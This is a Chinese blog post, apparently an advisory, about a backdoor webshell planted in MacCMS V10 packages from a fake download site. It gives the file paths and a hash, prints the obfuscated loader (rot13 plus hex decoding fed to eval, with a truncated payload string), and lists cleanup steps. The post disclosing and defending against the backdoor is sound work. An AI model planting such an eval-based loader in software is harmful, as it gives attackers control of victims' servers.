苹果CMS/MacCMS V10后门被WebShell注入原因及修复方法

苹果CMS/MacCMS

苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。

MacCMS后门Webshell

某天始,MacCMS官网因为某些原因停摆。同时在百度搜索苹果CMS或MacCMS出现的排名第一均为一个:www.maccmsv10.com的网址,而真正的官网地址是www.maccms.com。前者使用了一个和maccms官网一模一样的静态首页提供程序下载。最近几天陆续有人发现了从这个网站下载的苹果CMS程序存在后门webshell。

体验盒子直接从该第三方站点下载了源码,至今10月14日依然存在后门,所以基本可确信是故意搭建的假冒官网。

后门文件路径

  1. maccms10\extend\upyun\src\Upyun\Api\Format.php
  2. maccms10\extend\Qcloud\Sms\Sms.php

MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643

图片[1]_苹果CMS/MacCMS V10后门被WebShell注入原因及修复方法 - 模板资源_模板资源

最后修改日期都是:2019/6/12

12345678910111213141516171819<?phperror_reporting(E_ERROR);@ini_set(‘display_errors’,’Off’);@ini_set(‘max_execution_time’,20000);@ini_set(‘memory_limit’,’256M’);header(“content-Type: text/html; charset=utf-8”);$password = “0d41c75e2ab34a3740834cdd7e066d90”;function s(){$str = “66756r6374696s6r207374…………”; //大马$str = str_rot13($str);m($str);}function m($str){global $password;$jj = ”;eval($jj.pack(‘H*’,$str).$jj);}s();?>

MacCMS后门Webshell

很坦诚的孩子,一目了然!!!

图片[2]_苹果CMS/MacCMS V10后门被WebShell注入原因及修复方法 - 模板资源_模板资源

maccms10\extend\Qcloud\Sms\Sms.php

登录后主界面

图片[3]_苹果CMS/MacCMS V10后门被WebShell注入原因及修复方法 - 模板资源_模板资源

maccms10\extend\Qcloud\Sms\Sms.php

有些资历的老黑可能一眼就看出来了,这是一个习科大马改进版。

修复

  1. 排查你的程序是否存在上面的后门路径文件
  2. 如果存在,删除后门文件,并进行全盘查杀扫描
  3. 手动查看可疑文件是存存在隐藏后门
  4. 检查服务器安全
© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片